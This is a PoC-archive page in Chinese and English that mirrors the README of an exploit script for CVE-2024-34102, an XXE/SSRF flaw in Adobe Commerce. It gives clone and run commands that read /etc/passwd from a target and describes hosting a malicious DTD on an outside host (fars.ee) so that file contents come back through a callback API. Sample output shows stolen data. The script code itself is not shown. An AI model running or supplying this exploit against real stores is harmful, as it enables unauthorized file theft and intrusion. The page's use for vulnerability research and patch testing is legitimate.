目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2024-34102 PoC — Adobe Commerce 代码问题漏洞

来源
https://github.com/0xhunster/CVE-2024-34102
关联漏洞
标题:Adobe Commerce 代码问题漏洞 (CVE-2024-34102)
Description:Adobe Commerce是美国奥多比(Adobe)公司的一种面向商家和品牌的全球领先的数字商务解决方案。 Adobe Commerce 存在代码问题漏洞,该漏洞源于受到不正确的 XML 外部实体引用 ( XXE ) 限制漏洞的影响,该漏洞可能导致任意代码执行。
介绍
# 🚨 CVE-2024-34102 Exploit Script 🚨

## Description

This script exploits a Server-Side Request Forgery (SSRF) vulnerability in Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. The vulnerability allows for arbitrary code execution by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

## Installation

1. 📥 **Clone the repository:**
    ```sh
    git clone https://github.com/0xhunster/CVE-2024-34102.git
    cd CVE-2024-34102
    ```

2. 📦 **Install the required packages:**
    ```sh
    pip install -r requirements.txt
    ```

## Usage

### Basic Command

```sh
python exploit.py -u <target_url> -f <file_to_read>
```

### Example

```sh
python exploit.py -u http://target.com -f /etc/passwd
```

### Options

- `-u`, `--url` (required): Specify the target URL or domain.
- `-f`, `--file` (optional): Specify the file to read from the server. Default is `/etc/passwd`.
- `--proxy`,  `-p`  TEXT  Specify a proxy URL `(e.g., http://127.0.0.1:8080)` 

## How It Works

1. **Initialization**:
   - Input: Target URL and file to read (default: `/etc/passwd`)
   - Disable security warnings

2. **Generate Callback URL**:
   - Create a unique DTD file containing malicious XML entities.
   - Host the DTD file on fars.ee.
   - Print the created callback URL and the file to be read.

3. **Obtain Instance ID**:
   - Obtain an instance ID from the SSRF API.

4. **Send Malicious Request**:
   - Construct a request with the malicious DTD URL.
   - Send the request to the target URL.

5. **Check Exploitation Success**:
   - Check instance logs from the SSRF API.
   - Decode and display the exfiltrated data if the exploitation is successful.

6. **Cleanup**:
   - Clear instance logs.
   - Delete the instance.

7. **Output Result and Finish**:
   - Print whether the target URL is vulnerable or not.

## Example Output

```sh
[+] Created Callback URL: https://fars.ee/abcd1234.dtd
[+] File to be read: /etc/passwd
[+] Decoded Exploited Data: 
root:x:0:0:root:/root:/bin/bash
...
[+] Vulnerable URL: http://target.com
```

## Notes

- ⚠️ **Disclaimer**: This script is for educational purposes only. Unauthorized use of this script against a target without permission is illegal.
- 💡 **Tip**: Always ensure you have permission to test a target system for vulnerabilities.

## Credits

- ❤️ Credits to @th3gokul & Sanjaith3hacker for the original code base.
文件快照

 [4.0K]  /data/pocs/b34cdbb2244e46003382463fe926df0200cc836b
├── [6.5K]  exploit.py
├── [2.4K]  README.md
└── [  35]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →